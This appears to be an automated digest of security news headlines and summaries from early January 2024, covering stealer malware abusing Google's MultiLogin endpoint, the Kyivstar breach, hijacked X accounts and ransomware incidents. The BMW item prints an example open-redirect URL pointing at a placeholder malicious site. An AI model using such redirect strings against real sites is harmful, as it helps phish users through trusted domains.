Autosummary: Last week, cybersecurity firm CloudSEK revealed that these information-stealing malware operations are abusing a Google OAuth "MultiLogin" API endpoint to generate new, working authentication cookies when a victim's original stolen Google cookies expire. Since then, four other information stealers have adopted the same technique, including Stealc on December 1, Medusa on December 11, RisePro on December 12, and Whitesnake on December 26.


            Breaking down the state of authentication

            government
            2024-01-05 https://www.helpnetsecurity.com/2024/01/05/axiad-authentication-survey-video/

In this Help Net Security video, Bassam Al-Khalidi, co-CEO of Axiad, discusses the results of Axiad’s recent State of Authentication Survey. Key findings from the survey revealed:
– 39% indicated phishing is the most feared cyberattack, while 49% said it is the attack most likely to happen.
– 88% felt their company was prepared to defend against a password-based cyberattack, yet 52% said their business had fallen victim to one within the last year.
– … More



            Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware

            exploits
            2024-01-05 https://thehackernews.com/2024/01/orange-spain-faces-bgp-traffic-hijack.html
Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic. "The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," the

Autosummary: "Using the stolen account, the threat actor modified the AS number belonging to Orange's IP address, resulting in major disruptions to Orange and a 50% loss in traffic," cybersecurity firm Hudson Rock said.


            Alert: Ivanti Releases Patch for Critical Vulnerability in Endpoint Manager Solution

            exploits
            2024-01-05 https://thehackernews.com/2024/01/alert-ivanti-releases-patch-for.html
Ivanti has released security updates to address a critical flaw impacting its Endpoint Manager (EPM) solution that, if successfully exploited, could result in remote code execution (RCE) on susceptible servers. Tracked as CVE-2023-39336, the vulnerability has been rated 9.6 out of 10 on the CVSS scoring system. The shortcoming impacts EPM 2021 and EPM 2022 prior to SU5. “If exploited, an



Russian Hackers Had Covert Access to Ukraine's Telecom Giant for Months

            rusia-ucrania Telcos
            2024-01-05 https://thehackernews.com/2024/01/russian-hackers-had-covert-access-to.html
Ukrainian cybersecurity authorities have disclosed that the Russian state-sponsored threat actor known as Sandworm was inside telecom operator Kyivstar's systems at least since May 2023. The development was first reported by Reuters. The incident, described as a "powerful hacker attack," first came to light last month, knocking out access to mobile and internet services



            MyEstatePoint Property Search Android app leaks user passwords

            government
            2024-01-05 https://securityaffairs.com/156939/security/myestatepoint-property-search-android-app-leaks-user-passwords.html
The MyEstatePoint Property Search app leaked data on nearly half a million of its users, exposing their names and plain-text passwords, the Cybernews research team has found. The all-in-one real estate app MyEstatePoint Property Search left a publicly accessible MongoDB server containing the sensitive details of its app users. The app, developed by NJ Technologies, […]



            Russia-linked APT Sandworm was inside Ukraine telecoms giant Kyivstar for months

            Telcos
            2024-01-05 https://securityaffairs.com/156958/cyber-warfare-2/sandworm-inside-kyivstar-for-months.html
Ukrainian authorities revealed that Russia-linked APT Sandworm had been inside telecom giant Kyivstar at least since May 2023. Russia-linked APT group Sandworm was inside Ukrainian telecoms giant Kyivstar from at least May 2023, the head of Ukraine’s Security Service (SBU) told Reuters. “This attack is a big message, a big warning, not only to […]

Autosummary: In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe.


            Memorial University recovers from cyberattack, delays semester start

            ciber
            2024-01-05 https://www.bleepingcomputer.com/news/security/memorial-university-recovers-from-cyberattack-delays-semester-start/
            The Memorial University of Newfoundland (MUN) continues to deal with the effects of a cyberattack that occurred in late December and postponed the start of classes in one campus. [...]

            Autosummary: "To support the incredible team of Grenfell Campus IT professionals in their efforts, additional information technology (IT) personnel have arrived at Grenfell to assist with on-campus needs, while IT staff in St. John's are also working with their colleagues to support the needs at Grenfell Campus" - Memorial University of Newfoundland. In an update yesterday, the university announced that internet and WiFi for resident students are still not operational.


            The source code of Zeppelin Ransomware sold on a hacking forum

            exploits ransomware
            2024-01-05 https://securityaffairs.com/156974/cyber-crime/zeppelin-ransomware-source-code.html
            A threat actor announced the sale of the source code and a cracked version of the Zeppelin ransomware builder for $500. Researchers from cybersecurity firm KELA reported that a threat actor announced on a cybercrime forum the sale of the source code and a cracked version of the Zeppelin ransomware builder for $500. The seller clarified that it has […]

            Autosummary: The ransomware was involved in attacks aimed at technology and healthcare, defense contractors, educational institutions, manufacturers, companies across Europe, the United States, and Canada.


            The Week in Ransomware - January 5th 2024 - Secret decryptors

            exploits ransomware
            2024-01-05 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-5th-2024-secret-decryptors/
            With it being the first week of the New Year and some still away on vacation, it has been slow with ransomware news, attacks, and new information. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @LawrenceAbrams, @Ionut_Ilascu, @malwrhunterteam, @fwosar, @BleepinComputer, @serghei, @demonslay335, @Intel_by_KELA, @pcrisk, @BushidoToken, @BrettCallow, @emsisoft, @AlvieriD, and @srlabs. December 30th 2023: Researchers have created a decryptor that exploits a flaw in Black Basta ransomware, allowing victims to recover their files for free.


            Cybersecurity trends and challenges to watch out for in 2024 – Week in security with Tony Anscombe

            ciber
            2024-01-05 https://www.welivesecurity.com/en/videos/cybersecurity-trends-challenges-watch-out-for-2024/
            What are some of the key cybersecurity trends that people and organizations should have on their radars this year?



            CertiK Twitter account hijacked by cryptocurrency scammer posing as Forbes journalist

            financial
            2024-01-05 https://grahamcluley.com/certik-twitter-account-hijacked-by-cryptocurrency-scammer-posing-as-forbes-journalist/
            Web3 security outfit CertiK has fallen foul of scammers, who managed to hijack its Twitter account to share a malicious link to a fake version of the Revoke.cash project.

            Autosummary: As the report describes, hackers are also compromising dormant accounts, locking out their legitimate owners, and subscribing to a gold checkmark for 30 days in order to sell the accounts to others.


            15 open-source cybersecurity tools you’ll wish you’d known earlier

            ciber
            2024-01-04 https://www.helpnetsecurity.com/2024/01/04/open-source-cybersecurity-tools/

            Open-source tools represent a dynamic force in the technological landscape, embodying innovation, collaboration, and accessibility. These tools, developed with transparency and community-driven principles, allow users to scrutinize, modify, and adapt solutions according to their unique needs. In cybersecurity, open-source tools are invaluable assets, empowering organizations to fortify their defenses against evolving threats. In this article, you will find a list of open-source cybersecurity tools that you should definitely check out. Nemesis: Open-source offensive data enrichment … More

            Autosummary: Nemesis: Open-source offensive data enrichment and analytic pipeline. Nemesis is a centralized data processing platform that ingests, enriches, and performs analytics on offensive security assessment data (i.e., data collected during penetration tests and red team engagements). SessionProbe: Open-source multi-threaded pentesting tool. SessionProbe is a multi-threaded pentesting tool designed to evaluate user privileges in web applications.


            Consumers prepared to ditch brands after cybersecurity issues

            ciber
            2024-01-04 https://www.helpnetsecurity.com/2024/01/04/consumers-cybersecurity-issue/

            In 2023, businesses have been hit with 800,000 cyberattacks, over 60,000 of which were DDoS attacks and 4,000 falling victim to ransomware, according to Vercara. The research found that consumers hold nuanced perceptions regarding cybersecurity incidents and are often less aware of the role they play in maintaining cyber hygiene within a business. These findings underscore brand trust’s important role in the digital landscape – with an overwhelming 75% of consumers expressing their readiness to … More



            Mandiant's Twitter Account Restored After Six-Hour Crypto Scam Hack

            financial
            2024-01-04 https://thehackernews.com/2024/01/mandiants-twitter-account-restored.html
            American cybersecurity firm and Google Cloud subsidiary Mandiant had its X (formerly Twitter) account compromised for more than six hours by an unknown attacker to propagate a cryptocurrency scam. As of writing, the account has been restored on the social media platform. It's currently not clear how the account was breached. But the hacked Mandiant account was initially renamed to "@



            Industrial Defender Risk Signal integrates threat intelligence and business context

            industry
            2024-01-04 https://www.helpnetsecurity.com/2024/01/04/industrial-defender-risk-signal/

            Industrial Defender introduced Industrial Defender Risk Signal, its new risk-based vulnerability management (RBVM) solution. Building upon the company’s robust vulnerability assessment capabilities, Industrial Defender Risk Signal intelligently prioritizes vulnerability for highest impact, integrating threat intelligence and the user’s specific business context. Industrial Defender’s RBVM solution enables a significant evolution in vulnerability management for industrial environments. With enriched insights into which vulnerabilities matter most to the user’s specific operations, security teams can use Industrial Defender Risk … More



            UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT

            financial industry
            2024-01-04 https://thehackernews.com/2024/01/uac-0050-group-using-new-phishing.html
            The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software. "The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in



            Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

            Linux
            2024-01-04 https://thehackernews.com/2024/01/beware-3-malicious-pypi-packages-found.html
            Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. “These packages, upon initial use, deploy a CoinMiner



            Crooks hacked Mandiant X account to push cryptocurrency scam

            financial
            2024-01-04 https://securityaffairs.com/156879/hacking/mandiant-x-account-hacked.html
            The X account of cybersecurity giant Mandiant was hacked; attackers used it to impersonate the Phantom crypto wallet and push a cryptocurrency scam. Crooks hacked the X account of cybersecurity firm Mandiant and used it to impersonate the Phantom crypto platform and share a cryptocurrency scam. The X account of the Google-owned firm Mandiant has […]

            Autosummary: The X account of cybersecurity giant Mandiant was hacked; attackers used it to impersonate the Phantom crypto wallet and push a cryptocurrency scam.


            Hackers hijack govt and business accounts on X for crypto scams

            financial
            2024-01-04 https://www.bleepingcomputer.com/news/security/hackers-hijack-govt-and-business-accounts-on-x-for-crypto-scams/
            Hackers are increasingly targeting verified accounts on X (formerly Twitter) belonging to government and business profiles and marked with "gold" and "grey" checkmarks to promote cryptocurrency scams. [...]

            Autosummary: Some sellers also provide the option to add scam accounts as affiliates to the verified gold accounts for $500, lending them credibility without having to go through the more rigorous verification process from the social media platform.


            Zeppelin ransomware source code sold for $500 on hacking forum

            exploits ransomware
            2024-01-04 https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-source-code-sold-for-500-on-hacking-forum/
            A threat actor announced on a cybercrime forum that they sold the source code and a cracked version of the Zeppelin ransomware builder for just $500. [...]

            Autosummary: In November 2022, following the discontinuation of the Zeppelin RaaS operation, law enforcement and security researchers disclosed they had found exploitable flaws in Zeppelin's encryption scheme, allowing them to build a decrypter and help victims since 2020.


            Cryptocurrency wallet CEO loses $125,000 in wallet-draining scam

            financial
            2024-01-04 https://www.tripwire.com/state-of-security/cryptocurrency-wallet-ceo-loses-125000-wallet-draining-scam
            No one is too big, too clever, too security-savvy to avoid being duped - because it's only human to make a mistake and screw up. Read my article on the Tripwire State of Security blog.

            Autosummary: The offer of what can be considered equivalent to "free money" has often been used in recent years by fraudsters attempting to lure the unwary, using social networks, spam, and hacked websites to drive traffic to malicious phishing sites.


            HealthEC data breach impacted more than 4.5 Million people

            financial
            2024-01-04 https://securityaffairs.com/156911/data-breach/healthec-disclosed-data-breach.html
            Healthcare technology company HealthEC disclosed a data breach that exposed the personal information of 4.5 million individuals. Healthcare technology company HealthEC (HEC) disclosed a data breach that impacted 4.5 million customers of its business partners. HealthEC is a healthcare technology company that provides solutions for care coordination, population health management, and value-based care. The company’s […]



            Ivanti warns critical EPM bug lets hackers hijack enrolled devices

            exploits
            2024-01-04 https://www.bleepingcomputer.com/news/security/ivanti-warns-critical-epm-bug-lets-hackers-hijack-enrolled-devices/
            Ivanti fixed a critical remote code execution (RCE) vulnerability in its Endpoint Management software (EPM) that can let unauthenticated attackers hijack enrolled devices or the core server. [...]

            Autosummary: In July, state-affiliated hackers used two zero-day flaws (CVE-2023-35078 and CVE-2023-35081) in Ivanti's Endpoint Manager Mobile (EPMM), formerly MobileIron Core, to infiltrate the networks of multiple Norwegian government organizations.


            Russian hackers wiped thousands of systems in KyivStar attack

            rusia-ucrania
            2024-01-04 https://www.bleepingcomputer.com/news/security/russian-hackers-wiped-thousands-of-systems-in-kyivstar-attack/
            The Russian hackers behind a December breach of Kyivstar, Ukraine's largest telecommunications service provider, have wiped all systems on the telecom operator's core network. [...]

            Autosummary: "We attacked Kyivstar because the company provides communications to the Armed Forces of Ukraine, as well as government agencies and law enforcement agencies of Ukraine." Today, Vityuk confirmed that Sandworm was behind the December attack on Kyivstar, saying that this Russian military intelligence unit carried out other cyberattacks targeting Ukrainian targets, "in particular [..] telecom operators and ISPs."


            Trump companies got millions from foreign governments, Democrats say

            government
            2024-01-04 https://www.bbc.co.uk/news/business-67885908?at_medium=RSS&at_campaign=KARANGA
            Saudi Arabia, China, others spent big at his properties during presidency, says House Democrat report.



            Cybersecurity firm Mandiant has its Twitter account hacked to promote cryptocurrency scam

            financial ciber
            2024-01-04 https://grahamcluley.com/cybersecurity-firm-mandiant-has-its-twitter-account-hacked-to-promote-cryptocurrency-scam/
            Google-owned cybersecurity company Mandiant has found itself in the awkward position of having to wrestle back control of its Twitter account, after it was hijacked by scammers yesterday.

            Autosummary: The official Mandiant account, which is followed by over 100,000 people, was seized by scammers promoting links to a phony website which claimed to offer free $PHNTM cryptocurrency tokens (but which was actually aiming to drain punters’ wallets).


            Cybersecurity challenges emerge in the wake of API expansion

            ciber
            2024-01-03 https://www.helpnetsecurity.com/2024/01/03/vedran-cindric-treblle-building-apis/

            In this Help Net Security interview, Vedran Cindric, CEO at Treblle, discusses the exponential growth of AI-related APIs, citing a 96% increase in 2023. He sheds light on the integral role APIs play in powering AI interactions, revealing the invisible threads that connect users to AI-based chatbots and tools. As the technological landscape increasingly integrates AI, Cindric anticipates a profound impact on the evolution of APIs, emphasizing the growing importance of API security, authentication, and … More

            Autosummary: As the technological landscape increasingly integrates AI, Cindric anticipates a profound impact on the evolution of APIs, emphasizing the growing importance of API security, authentication, and the challenges posed by zombie endpoints. In this Help Net Security interview, Vedran Cindric, CEO at Treblle, discusses the exponential growth of AI-related APIs, citing a 96% increase in 2023. You might not see or understand it, but at the end of the day, all those questions, image lookups, or jokes are API requests.


            Emerging cybersecurity trends and expectations for 2024

            ciber
            2024-01-03 https://www.helpnetsecurity.com/2024/01/03/2024-cyber-attacks-video/

            In this Help Net Security video, John Dwyer, Head of Research at IBM X-Force, discusses how 2024 is poised to be an incredibly impactful year for cyber attacks, driven by world events and access to advanced technologies like AI.



            Facts and misconceptions about cybersecurity budgets

            ciber
            2024-01-03 https://www.helpnetsecurity.com/2024/01/03/cybersecurity-budgets-facts/

            Managing and allocating budgets for cybersecurity and IT has become an increasingly critical aspect of organizational strategy. Organizations recognize the need to invest significantly in cybersecurity to safeguard sensitive data, protect against ransomware attacks, and ensure the integrity of their IT infrastructure. A well-structured cybersecurity budget is crucial for staying ahead of emerging threats and minimizing potential risks. In this article, you will find excerpts from cybersecurity budget surveys we covered in 2023. These findings … More

            Autosummary: This year, 20% of CISOs did not receive a raise, double that of a year ago, while the share of CISOs with bigger retention bonuses and equity packages also declined to 12% (from 21%) and to 8% (from 24%), respectively.


            29 malware families target 1,800 banking apps worldwide

            financial exploits
            2024-01-03 https://www.helpnetsecurity.com/2024/01/03/banking-trojans-mobile-devices/

            Mobile banking is outpacing online banking across all age groups due to its convenience and our desire to have those apps at our fingertips, according to Zimperium. However, this surge is accompanied by a dramatic growth in financial fraud. The research uncovered that 29 malware families targeted 1,800 banking applications across 61 countries last year. In comparison, the 2022 report uncovered 10 prolific malware families targeting 600 banking apps. Banking trojans persistently target mobile devices … More

            Autosummary: “By monitoring millions of devices, Zimperium has identified alarming figures highlighting how widespread, global, and successful mobile banking malware can be,” said Jon Paterson, CTO at Zimperium. Implement runtime visibility for comprehensive threat monitoring and modeling: Mobile application security leaders must enable runtime visibility across various threat vectors, including device, network, application, and phishing.


            CISA warns of actively exploited bugs in Chrome and Excel parsing library

            exploits
            2024-01-03 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-bugs-in-chrome-and-excel-parsing-library/
            The U.S. Cybersecurity and Infrastructure Security Agency has added two vulnerabilities to the Known Exploited Vulnerabilities catalog, a recently patched flaw in Google Chrome and a bug affecting an open-source Perl library for reading information in an Excel file called Spreadsheet::ParseExcel. [...]

            Autosummary: “Google Chromium WebRTC, an open-source project providing web browsers with real-time communication, contains a heap buffer overflow vulnerability that allows an attacker to cause crashes or code execution,” reads CISA’s summary of the flaw.


            Malware Using Google MultiLogin Exploit to Maintain Access Despite Password Reset

            exploits
            2024-01-03 https://thehackernews.com/2024/01/malware-using-google-multilogin-exploit.html
            Information-stealing malware is actively taking advantage of an undocumented Google OAuth endpoint named MultiLogin to hijack user sessions and allow continuous access to Google services even after a password reset. According to CloudSEK, the critical exploit facilitates session persistence and cookie generation, enabling threat actors to maintain access to a valid session in an

            Autosummary: It has since been incorporated into various malware-as-a-service (MaaS) stealer families, such as Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake.


            Mexico police search for migrants kidnapped off coach

            latam
            2024-01-03 https://www.bbc.co.uk/news/world-latin-america-67872039?at_medium=RSS&at_campaign=KARANGA
            Armed men boarded a bus carrying mostly migrants to the US-Mexico border and kidnapped more than 30.



            Data breach at healthcare tech firm impacts 4.5 million patients

            financial
            2024-01-03 https://www.bleepingcomputer.com/news/security/data-breach-at-healthcare-tech-firm-impacts-45-million-patients/
            HealthEC LLC, a provider of health management solutions, suffered a data breach that impacts close to 4.5 million individuals who received care through one of the company's customers. [...]



            Investment fraud a serious money maker for criminals

            financial
            2024-01-03 https://www.malwarebytes.com/blog/news/2024/01/investment-fraud-a-serious-money-maker-for-criminals
            Europol’s spotlight report ‘Online fraud schemes: a web of deceit’ identifies investment fraud as a major threat.

            Autosummary: We are by no means financial experts, but we have seen too many good people lose money on Ponzi schemes, rug-pulls, and fake Initial Coin Offerings (ICOs), so we feel it is our job to keep you safe, and warn against these types of online investment frauds. Europol’s spotlight report ‘Online fraud schemes: a web of deceit’ looks into online fraud schemes—a major crime threat in the EU and beyond—and one of the report’s primary themes is investment fraud. Treat calls, texts, mails, and other advice out of the blue with extreme caution.


            Don’t trust links with known domains: BMW affected by redirect vulnerability

            exploits
            2024-01-03 https://securityaffairs.com/156843/reports/bmw-affected-by-redirect-vulnerability.html
            Sometimes, you can’t even trust links with your own domain. As the Cybernews research team has discovered, some BMW subdomains were vulnerable to a redirect vulnerability, enabling attackers to forge links leading to malicious sites through them. Cybernews researchers have discovered two BMW subdomains that were vulnerable to an SAP redirect vulnerability. They were used to access […]

            Autosummary: This means that anyone could forge a redirect link using these subdomains by adding a string such as this: “sap/public/bc/icf/logoff?redirecturl=https://maliciouswebsite.com”. The final URL would look like this: “https://<…>.bmw.com/sap/public/bc/icf/logoff?redirecturl=https://maliciouswebsite.com”. “It allows an attacker to redirect a user to a malicious website or inject arbitrary content into a legitimate website.


            Suspects held over alleged Argentina parcel plot

            latam
            2024-01-03 https://www.bbc.co.uk/news/world-latin-america-67872044?at_medium=RSS&at_campaign=KARANGA
            Three men from Lebanon and Syria were detained in Buenos Aires, where a Jewish sporting event is under way.



            Brazil jails: Hundreds of inmates use Christmas release to escape

            latam
            2024-01-03 https://www.bbc.co.uk/news/world-latin-america-67871776?at_medium=RSS&at_campaign=KARANGA
            Officials are hunting more than 250 inmates who were granted temporary release for the holiday.



            Mandiant's Twitter account hacked to push cryptocurrency scam

            financial
            2024-01-03 https://www.bleepingcomputer.com/news/security/mandiants-twitter-account-hacked-to-push-cryptocurrency-scam/
            The Twitter account of American cybersecurity firm and Google subsidiary Mandiant was hijacked earlier today to impersonate the Phantom crypto wallet and share a cryptocurrency scam. [...]



            Cybercriminals Implemented Artificial Intelligence (AI) for Invoice Fraud

            ciber
            2024-01-03 https://securityaffairs.com/156863/cyber-crime/artificial-intelligence-tool-for-invoice-fraud.html
            Crooks created a new tool that uses Artificial Intelligence (AI) for creating fraudulent invoices used for wire fraud and BEC. Resecurity has uncovered a cybercriminal faction known as “GXC Team”, who specializes in crafting tools for online banking theft, ecommerce deception, and internet scams. Around November 11th, 2023, the group’s leader, operating under the alias […]

            Autosummary: Presently, the tools crafted by the “GXC Team” are capable of targeting over 300 entities, including top financial institutions, government services, postal services, cryptocurrency platforms, payment networks, and major international online marketplaces, including AMEX, Amazon, Binance, Coinbase, Office 365 (Microsoft), PayPal, ING, Santander, Deutsche Bank, Postbank, DKB AG (Das kann Bank), BBBank eG (formerly Badische Beamtenbank) and multiple Spain-based banks, specifically including ABANCA, Banca March, Banco de Sabadell, Grupo Caja Rural, Unicaja Banco SA, Caixa Enginyers, Banco Mediolanum, Laboral Kutxa, Eurocaja Dynamic, BBVA, and Santander. It’s noteworthy that most of the victim accounts identified were predominantly from the U.K. and various EU countries, including but not limited to Spain, France, Poland, Italy, Germany, and Switzerland, among others. Around November 11th, 2023, the group’s leader, operating under the alias “googleXcoder”, made multiple announcements on the Dark Web.


            CISA ADDS CHROME AND PERL LIBRARY FLAWS TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG

            exploits
            2024-01-03 https://securityaffairs.com/156854/security/cisa-adds-chrome-perl-library-flaws-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chrome and Perl library flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two Qlik Sense vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below is the list of the issues added to the catalog: CVE-2023-7024 – The vulnerability is a Heap […]

            Autosummary: U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chrome and Perl library flaws to its Known Exploited Vulnerabilities catalog.


            Mandiant’s account on X hacked to push cryptocurrency scam

            financial
            2024-01-03 https://www.bleepingcomputer.com/news/security/mandiants-account-on-x-hacked-to-push-cryptocurrency-scam/
            The Twitter account of American cybersecurity firm and Google subsidiary Mandiant was hijacked earlier today to impersonate the Phantom crypto wallet and share a cryptocurrency scam. [...]



            Key cybersecurity skills gap statistics you should be aware of

            industry ciber
            2024-01-02 https://www.helpnetsecurity.com/2024/01/02/cybersecurity-skills-gap-statistics/

            As the sophistication and frequency of cyber threats continue to escalate, the demand for skilled cybersecurity professionals has never been bigger. The skills gap is not merely a statistical discrepancy; it represents a substantial vulnerability in the defense mechanisms of businesses and institutions. From the shortage of experts in critical areas such as penetration testing and threat analysis to the broader issues of workforce diversity and continuous skill development, the problems contributing to this gap … More

            Autosummary: When looking at soft skills, communication (58%), critical thinking (54%), problem-solving (49%), teamwork (45%), and attention to detail (36%) come in as the top five skills employers are seeking in cybersecurity job candidates.


            Hackers employ nuanced tactics to evade detection

            industry
            2024-01-02 https://www.helpnetsecurity.com/2024/01/02/2023-holiday-attacks/

            Threat actors evolved tactics, opting for a more nuanced approach that spread attacks across a broader timeframe to blend in with legitimate traffic and evade detection during peak holiday shopping times, according to Cequence Security. 2023 holiday season unveiled alarming realities The months before the 2023 holidays demonstrated a change in tactics, techniques, and procedures by adversaries against prominent retailers. Attackers have shown that they are highly sophisticated and have great persistence and depth of … More

            Autosummary: In the second half of 2023 alone, gift card fraud increased by 110%, while scraping, loyalty card fraud and payment card fraud increased by a collective average of over 700% as attackers lay the groundwork for holiday sale attacks ahead of retailer security crackdowns.


            Wi-Fi 7’s mission-critical role in enterprise, industrial networking

            industry
            2024-01-02 https://www.helpnetsecurity.com/2024/01/02/tiago-rodrigues-wireless-broadband-alliance-wi-fi-7-networks/

            As we transition from Wi-Fi 6 to the more advanced Wi-Fi 7, we uncover the significant enhancements in speed, efficiency, and spectrum usage that set it apart from its predecessors. In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. Rodrigues examines the crucial role of AI and machine learning in … More

            Autosummary: We expect network executives will continue deploying Wi-Fi and cellular in the coming years, with Wi-Fi 6E/7 for indoor, on-campus, and fixed network situations and 5G/cellular for outdoor, off-campus, and fast-mobility environments. Wi-Fi 7 will enable consumer, enterprise, Industry 4.0, medical, smart city and other applications that are impractical or impossible with other wired and wireless technologies, providing twice the bandwidth of Wi-Fi 6 and providing features such as deterministic network support. Wi-Fi 6, 6E and 7 topped the list of wireless technologies that network operators, ISPs, device and chipset vendors, enterprises and other companies plan to deploy by the end of 2024, in our latest cross-industry report.


            Cybercriminals set their sights on crypto markets

            ciber
            2024-01-02 https://www.helpnetsecurity.com/2024/01/02/cryptocurrency-cyber-threats-video/

            The cryptocurrency market has grown significantly, attracting both enthusiasts and investors. However, the rise of cryptocurrencies has also brought forth an unprecedented need for cybersecurity measures. Cybersecurity in the context of cryptocurrencies involves safeguarding not only the blockchain networks but also the digital wallets, exchanges, and trading platforms that facilitate the transfer of these assets. In this Help Net Security round-up, we present segments from previously recorded videos in which cybersecurity experts discuss the increasing … More

            The post Cybercriminals set their sights on crypto markets appeared first on Help Net Security.

            "

            Autosummary: "


            Xerox says subsidiary XBS U.S. breached after ransomware gang leaks data

            exploits ransomware
            2024-01-02 https://www.bleepingcomputer.com/news/security/xerox-says-subsidiary-xbs-us-breached-after-ransomware-gang-leaks-data/
            The U.S. division of Xerox Business Solutions (XBS) has been compromised by hackers, and a limited amount of personal information might have been exposed, according to an announcement by the parent company, Xerox Corporation. [...] "

            Autosummary: "


            Victoria court recordings exposed in reported ransomware attack

            exploits ransomware
            2024-01-02 https://www.bleepingcomputer.com/news/security/victoria-court-recordings-exposed-in-reported-ransomware-attack/
Australia's Court Services Victoria (CSV) is warning that video recordings of court hearings were exposed after suffering a reported Qilin ransomware attack. [...] "

Autosummary: Specifically, the following courts and jurisdictions have been impacted by the security incident: Supreme Court – hearings from the Court of Appeal, Criminal Division, and Practice Court between December 1 and 21, and two regional hearings in November 2023. "


            Oops! Black Basta ransomware flubs encryption

            exploits ransomware
            2024-01-02 https://www.malwarebytes.com/blog/news/2024/01/oops-black-basta-ransomware-flubs-encryption
            Researchers have found a flaw in the Black Basta ransomware encryption algorithm, allowing decryption of some files. "

            Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. The decryptor, called Black Basta Buster, exploits a flaw in the encryption algorithm used in older versions of the Black Basta group’s ransomware. "


            Online museum collections down after cyberattack on service provider

            ciber Telcos
            2024-01-02 https://www.bleepingcomputer.com/news/security/online-museum-collections-down-after-cyberattack-on-service-provider/
            Museum software solutions provider Gallery Systems has disclosed that its ongoing IT outages were caused by a ransomware attack last week. [...] "

            Autosummary: "


            Researchers released a free decryptor for Black Basta ransomware

            exploits ransomware
            2024-01-02 https://securityaffairs.com/156806/malware/black-basta-ransomware-decryptor.html
A team of researchers released a suite of tools that could help victims decrypt data encrypted by the Black Basta ransomware. Independent security research and consulting team SRLabs discovered a vulnerability in Black Basta ransomware’s encryption algorithm and exploited it to create a free decryptor. The Black Basta ransomware group has been active since April […] "

Autosummary: Researchers released a free decryptor for Black Basta ransomware Pierluigi Paganini January 02, 2024 A team of researchers released a suite of tools that could help victims decrypt data encrypted by the Black Basta ransomware. According to the experts, the ransomware gang has infected over 329 victims, including ABB, Capita, Dish Network, and Rheinmetall. "


            New JinxLoader Targeting Users with Formbook and XLoader Malware

            exploits
            2024-01-01 https://thehackernews.com/2024/01/new-jinxloader-targeting-users-with.html
            A new Go-based malware loader called JinxLoader is being used by threat actors to deliver next-stage payloads such as Formbook and its successor XLoader. The disclosure comes from cybersecurity firms Palo Alto Networks Unit 42 and Symantec, both of which highlighted multi-step attack sequences that led to the deployment of JinxLoader through phishing attacks. "The "

            Autosummary: "


            Cactus RANSOMWARE gang hit the Swedish retail and grocery provider Coop

            exploits ransomware
            2024-01-01 https://securityaffairs.com/156709/cyber-crime/cactus-ransomware-coop-sweden.html
            The Cactus ransomware group claims to have hacked Coop, one of the largest retail and grocery providers in Sweden. Coop is one of the largest retail and grocery providers in Sweden, with approximately 800 stores across the country. The stores are co-owned by 3.5 million members in 29 consumer associations. All surplus that is created […] "

Autosummary: Cactus RANSOMWARE gang hit the Swedish retail and grocery provider Coop Pierluigi Paganini January 01, 2024 The Cactus ransomware group claims to have hacked Coop, one of the largest retail and grocery providers in Sweden. "


            Top 2023 Security Affairs cybersecurity stories

            ciber
            2024-01-01 https://securityaffairs.com/156722/breaking-news/top-2023-security-affairs-stories.html
            These are the Top 2023 Security Affairs cybersecurity stories … enjoy it. CYBERCRIMINALS LAUNCHED “LEAKSMAS” EVENT IN THE DARK WEB EXPOSING MASSIVE VOLUMES OF LEAKED PII AND COMPROMISED DATA Leaksmas: On Christmas Eve, multiple threat actors released substantial data leaks, Resecurity experts reported. 1.7 TB OF DATA STOLEN FROM DIGITAL INTELLIGENCE FIRM CELLEBRITE LEAKED ONLINE […] "

            Autosummary: "


            Malware exploits undocumented Google OAuth endpoint to regenerate Google cookies

            exploits
            2024-01-01 https://securityaffairs.com/156723/hacking/exploit-regenerates-google-cookies.html
            CloudSEK researchers analyzed a zero-day exploit that can allow the generation of persistent Google cookies through token manipulation. In October 2023, a developer known as PRISMA first uncovered an exploit that allows the generation of persistent Google cookies through token manipulation. An attacker can use the exploit to access Google services, even after a user’s […] "

            Autosummary: Researchers from Hudson Rock were among the first to warn of threat actors exploiting the zero-day exploit: The Google 0-Day that all Infostealer groups are exploiting: https://t.co/V5EuU0LFzz pic.twitter.com/xZnobAuuap — Hudson Rock (@RockHudsonRock) December 27, 2023 CloudSEK performed a reverse engineering of the exploit and discovered it relies on an undocumented Google OAuth endpoint named ‘MultiLogin. "


            The biggest cybersecurity and cyberattack stories of 2023

            ciber
            2024-01-01 https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2023/
